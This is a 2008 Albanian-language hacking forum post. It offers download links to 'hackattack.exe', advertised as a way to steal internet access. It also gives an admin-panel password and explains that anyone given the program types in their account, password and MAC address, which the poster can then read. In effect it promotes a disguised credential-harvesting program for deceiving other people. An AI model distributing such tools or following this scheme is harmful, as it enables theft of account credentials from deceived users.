Execute-FORUM
 
ForumPortalCalendarGalleryPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Qe Nje me menyR si me vjedhh rrjet

Shko poshtë 
AutoriMesazh
kknnuutzzkr3Jzzi
AdMiNiStRaToR
AdMiNiStRaToR
avatar

Numri i postimeve : 24
Age : 24
Location : skkenderaj
Registration date : 05/11/2008

MesazhTitulli: Qe Nje me menyR si me vjedhh rrjet   Sat Nov 08, 2008 12:55 am

kam ba kit program per mu munu me vjedh rrjet

e pash se e kish postu ni antar dhe e kish ba kishe me marr internet pa pare
e ka dit passwordin e admincp
mos u mashtroni

Download:

Kodi:
http://www.conndor.net/hackattack.exe[Mirror]:

Kodi:
depositfiles.com 3009785Shperndajeni programin

Passwordi i Admin CP osht:

Kodi:
ipkokujtesahackun nuk pe perdori kshtu qe vendosa me
qit ne vigy-army

masi qi t'ia jepni najkujt programin aj e shkrun aty Accountin passwordin edhe MAC Adresen
Qysh mi gjet kto t'dhana?:
Hini te butoni AdminCP edhe shkrujeni passwordin qi e thash ma nalt
edhe tani aty jan krejt t'dhanat qka kan shkrujt njerzit
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.snnk-clan.tk
 
Qe Nje me menyR si me vjedhh rrjet
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Mir se Vini ne ASC FORUM :: Hacking programe & Tutoriale-
Kërce tek: